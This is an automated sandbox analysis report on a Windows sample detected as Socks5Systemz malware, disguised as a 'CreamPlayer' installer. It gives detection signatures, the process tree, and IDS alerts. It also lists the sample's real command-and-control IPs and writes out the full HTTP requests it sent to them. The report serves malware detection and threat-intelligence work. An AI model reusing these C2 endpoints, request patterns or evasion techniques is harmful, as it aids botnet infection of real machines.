Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
bzX2pV3Ybw.exe

Overview

General Information

Sample name:bzX2pV3Ybw.exe
renamed because original name is a hash value
Original sample name:cd6081e11eb60abfa77c3b587726d83f.exe
Analysis ID:1575123
MD5:cd6081e11eb60abfa77c3b587726d83f
SHA1:f1573e60caa0aa5b8a75584f2ec8f14c1ad005bf
SHA256:efbf1bcbd351efeab32b9279284c5fa064210e2d8e42d896cc065c2d60f6fe49
Tags:exeuser-abuse_ch
Infos:

Detection

Socks5Systemz
Score:96
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Yara detected Socks5Systemz
AI detected suspicious sample
Contains functionality to infect the boot sector
Found API chain indicative of debugger detection
Machine Learning detection for dropped file
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain (date check)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • bzX2pV3Ybw.exe (PID: 7288 cmdline: "C:\Users\user\Desktop\bzX2pV3Ybw.exe" MD5: CD6081E11EB60ABFA77C3B587726D83F)
    • bzX2pV3Ybw.tmp (PID: 7316 cmdline: "C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmp" /SL5="$103F2,3847834,56832,C:\Users\user\Desktop\bzX2pV3Ybw.exe" MD5: 726BF37850FF846984004440C4875481)
      • net.exe (PID: 7392 cmdline: "C:\Windows\system32\net.exe" pause cream_player_12135 MD5: 31890A7DE89936F922D44D677F681A7F)
        • conhost.exe (PID: 7400 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • net1.exe (PID: 7472 cmdline: C:\Windows\system32\net1 pause cream_player_12135 MD5: 2EFE6ED4C294AB8A39EB59C80813FEC1)
      • creamplayer_x32.exe (PID: 7420 cmdline: "C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exe" -i MD5: A3E56DEA396FF196EFE4C3E60B998E88)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\CreamPlayer 1.12\is-JIRG1.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\ProgramData\SmartImageDrive\SmartImageDrive.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        SourceRuleDescriptionAuthorStrings
        00000005.00000002.2616558941.0000000002D41000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
          00000005.00000002.2616261521.0000000002CA0000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
            00000002.00000002.2615859333.00000000058E0000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
              00000005.00000000.1369381246.0000000000401000.00000020.00000001.01000000.00000009.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                Process Memory Space: creamplayer_x32.exe PID: 7420JoeSecurity_Socks5SystemzYara detected Socks5SystemzJoe Security
                  SourceRuleDescriptionAuthorStrings
                  5.0.creamplayer_x32.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-14T14:08:29.588842+010020287653Unknown Traffic192.168.2.949844188.119.66.185443TCP
                    2024-12-14T14:08:35.159950+010020287653Unknown Traffic192.168.2.949858188.119.66.185443TCP
                    2024-12-14T14:08:37.467591+010020287653Unknown Traffic192.168.2.949864188.119.66.185443TCP
                    2024-12-14T14:08:39.877945+010020287653Unknown Traffic192.168.2.949873188.119.66.185443TCP
                    2024-12-14T14:08:42.381332+010020287653Unknown Traffic192.168.2.949880188.119.66.185443TCP
                    2024-12-14T14:08:44.699486+010020287653Unknown Traffic192.168.2.949886188.119.66.185443TCP
                    2024-12-14T14:08:46.971425+010020287653Unknown Traffic192.168.2.949892188.119.66.185443TCP
                    2024-12-14T14:08:49.443045+010020287653Unknown Traffic192.168.2.949898188.119.66.185443TCP
                    2024-12-14T14:08:51.908215+010020287653Unknown Traffic192.168.2.949904188.119.66.185443TCP
                    2024-12-14T14:08:54.447882+010020287653Unknown Traffic192.168.2.949910188.119.66.185443TCP
                    2024-12-14T14:08:56.927354+010020287653Unknown Traffic192.168.2.949913188.119.66.185443TCP
                    2024-12-14T14:08:59.449951+010020287653Unknown Traffic192.168.2.949919188.119.66.185443TCP
                    2024-12-14T14:09:01.721611+010020287653Unknown Traffic192.168.2.949925188.119.66.185443TCP
                    2024-12-14T14:09:04.010229+010020287653Unknown Traffic192.168.2.949931188.119.66.185443TCP
                    2024-12-14T14:09:06.325119+010020287653Unknown Traffic192.168.2.949939188.119.66.185443TCP
                    2024-12-14T14:09:08.661654+010020287653Unknown Traffic192.168.2.949946188.119.66.185443TCP
                    2024-12-14T14:09:11.128945+010020287653Unknown Traffic192.168.2.949952188.119.66.185443TCP
                    2024-12-14T14:09:13.599152+010020287653Unknown Traffic192.168.2.949958188.119.66.185443TCP
                    2024-12-14T14:09:16.301206+010020287653Unknown Traffic192.168.2.949966188.119.66.185443TCP
                    2024-12-14T14:09:18.610269+010020287653Unknown Traffic192.168.2.949972188.119.66.185443TCP
                    2024-12-14T14:09:20.892262+010020287653Unknown Traffic192.168.2.949978188.119.66.185443TCP
                    2024-12-14T14:09:23.366201+010020287653Unknown Traffic192.168.2.949984188.119.66.185443TCP
                    2024-12-14T14:09:25.663334+010020287653Unknown Traffic192.168.2.949990188.119.66.185443TCP
                    2024-12-14T14:09:27.945791+010020287653Unknown Traffic192.168.2.949996188.119.66.185443TCP
                    2024-12-14T14:09:30.381248+010020287653Unknown Traffic192.168.2.949999188.119.66.185443TCP
                    2024-12-14T14:09:32.874192+010020287653Unknown Traffic192.168.2.950000188.119.66.185443TCP
                    2024-12-14T14:09:35.176443+010020287653Unknown Traffic192.168.2.950001188.119.66.185443TCP
                    2024-12-14T14:09:37.584228+010020287653Unknown Traffic192.168.2.950002188.119.66.185443TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-12-14T14:08:30.291348+010028032742Potentially Bad Traffic192.168.2.949844188.119.66.185443TCP
                    2024-12-14T14:08:35.895027+010028032742Potentially Bad Traffic192.168.2.949858188.119.66.185443TCP
                    2024-12-14T14:08:38.163965+010028032742Potentially Bad Traffic192.168.2.949864188.119.66.185443TCP
                    2024-12-14T14:08:40.572408+010028032742Potentially Bad Traffic192.168.2.949873188.119.66.185443TCP
                    2024-12-14T14:08:43.099381+010028032742Potentially Bad Traffic192.168.2.949880188.119.66.185443TCP
                    2024-12-14T14:08:45.394193+010028032742Potentially Bad Traffic192.168.2.949886188.119.66.185443TCP
                    2024-12-14T14:08:47.666729+010028032742Potentially Bad Traffic192.168.2.949892188.119.66.185443TCP
                    2024-12-14T14:08:50.137691+010028032742Potentially Bad Traffic192.168.2.949898188.119.66.185443TCP
                    2024-12-14T14:08:52.602609+010028032742Potentially Bad Traffic192.168.2.949904188.119.66.185443TCP
                    2024-12-14T14:08:55.148331+010028032742Potentially Bad Traffic192.168.2.949910188.119.66.185443TCP
                    2024-12-14T14:08:57.628951+010028032742Potentially Bad Traffic192.168.2.949913188.119.66.185443TCP
                    2024-12-14T14:09:00.148989+010028032742Potentially Bad Traffic192.168.2.949919188.119.66.185443TCP
                    2024-12-14T14:09:02.419889+010028032742Potentially Bad Traffic192.168.2.949925188.119.66.185443TCP
                    2024-12-14T14:09:04.718150+010028032742Potentially Bad Traffic192.168.2.949931188.119.66.185443TCP
                    2024-12-14T14:09:07.080336+010028032742Potentially Bad Traffic192.168.2.949939188.119.66.185443TCP
                    2024-12-14T14:09:09.360133+010028032742Potentially Bad Traffic192.168.2.949946188.119.66.185443TCP
                    2024-12-14T14:09:11.829922+010028032742Potentially Bad Traffic192.168.2.949952188.119.66.185443TCP
                    2024-12-14T14:09:14.395279+010028032742Potentially Bad Traffic192.168.2.949958188.119.66.185443TCP
                    2024-12-14T14:09:17.032412+010028032742Potentially Bad Traffic192.168.2.949966188.119.66.185443TCP
                    2024-12-14T14:09:19.305823+010028032742Potentially Bad Traffic192.168.2.949972188.119.66.185443TCP
                    2024-12-14T14:09:21.592309+010028032742Potentially Bad Traffic192.168.2.949978188.119.66.185443TCP
                    2024-12-14T14:09:24.084812+010028032742Potentially Bad Traffic192.168.2.949984188.119.66.185443TCP
                    2024-12-14T14:09:26.359534+010028032742Potentially Bad Traffic192.168.2.949990188.119.66.185443TCP
                    2024-12-14T14:09:28.647792+010028032742Potentially Bad Traffic192.168.2.949996188.119.66.185443TCP
                    2024-12-14T14:09:31.084241+010028032742Potentially Bad Traffic192.168.2.949999188.119.66.185443TCP
                    2024-12-14T14:09:33.567818+010028032742Potentially Bad Traffic192.168.2.950000188.119.66.185443TCP
                    2024-12-14T14:09:35.911468+010028032742Potentially Bad Traffic192.168.2.950001188.119.66.185443TCP
                    2024-12-14T14:09:38.363095+010028032742Potentially Bad Traffic192.168.2.950002188.119.66.185443TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd325Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4Avira URL Cloud: Label: malware
                    Source: https://188.119.66.185/ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188Avira URL Cloud: Label: malware
                    Source: bzX2pV3Ybw.exeReversingLabs: Detection: 21%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
                    Source: C:\ProgramData\SmartImageDrive\SmartImageDrive.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045D188 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion,2_2_0045D188
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045D254 ArcFourCrypt,2_2_0045D254
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_0045D23C ArcFourCrypt,2_2_0045D23C
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_10001000 ISCryptGetVersion,2_2_10001000
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_10001130 ArcFourCrypt,2_2_10001130

                    Compliance

                    barindex
                    Source: C:\Users\user\AppData\Local\CreamPlayer 1.12\creamplayer_x32.exeUnpacked PE file: 5.2.creamplayer_x32.exe.400000.0.unpack
                    Source: bzX2pV3Ybw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\CreamPlayer_is1Jump to behavior
                    Source: unknownHTTPS traffic detected: 188.119.66.185:443 -> 192.168.2.9:49844 version: TLS 1.2
                    Source: Binary string: msvcp71.pdbx# source: is-7JNKK.tmp.2.dr
                    Source: Binary string: msvcr71.pdb< source: is-5889C.tmp.2.dr
                    Source: Binary string: msvcp71.pdb source: is-7JNKK.tmp.2.dr
                    Source: Binary string: MicrosoftWindowsGdiPlus-1.0.2600.1360-gdiplus.pdb source: is-FFG28.tmp.2.dr
                    Source: Binary string: msvcr71.pdb source: is-5889C.tmp.2.dr
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00452A60 FindFirstFileA,GetLastError,2_2_00452A60
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00474F88 FindFirstFileA,FindNextFileA,FindClose,2_2_00474F88
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_004980A4 FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose,2_2_004980A4
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00464158 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00464158
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00462750 FindFirstFileA,FindNextFileA,FindClose,2_2_00462750
                    Source: C:\Users\user\AppData\Local\Temp\is-VLOHC.tmp\bzX2pV3Ybw.tmpCode function: 2_2_00463CDC SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode,2_2_00463CDC
                    Source: global trafficTCP traffic: 192.168.2.9:49850 -> 31.214.157.206:2024
                    Source: Joe Sandbox ViewIP Address: 31.214.157.206 31.214.157.206
                    Source: Joe Sandbox ViewIP Address: 188.119.66.185 188.119.66.185
                    Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49873 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49844 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49880 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49892 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49898 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49886 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49864 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49858 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49910 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49913 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49919 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49925 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49931 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49939 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49946 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49952 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49958 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49966 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49972 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49978 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49984 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49990 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49996 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50001 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:49999 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50002 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.9:50000 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49858 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49873 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49880 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49913 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49844 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49886 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49925 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49939 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49966 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49910 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49958 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50001 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50002 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:50000 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49919 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49864 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49978 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49972 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49892 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49984 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49996 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49946 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49931 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49898 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49952 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49904 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49990 -> 188.119.66.185:443
                    Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.9:49999 -> 188.119.66.185:443
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b82a8dcd6c946851e30088dd3250aa15d405633775b0e650f2ba1e9c95b1c92975ccf55bc592fe5a818ece02a1b7e2984c57cad7021dda322c18d43188 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
                    Source: global trafficHTTP traffic detected: GET /ai/?key=8f3f2b3ab71046392219e2a5231e72eee7c4db7e40b92a8dcd6c94694fb249829e7c4ce74dc34f7f632af3b70caaf94cda9ea6967478d3f44cc588fa45d7d69a43faeaa5960502d18f414ad332231ad73184d5d59559 HTTP/1.1User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)Host: 188.119.66.185
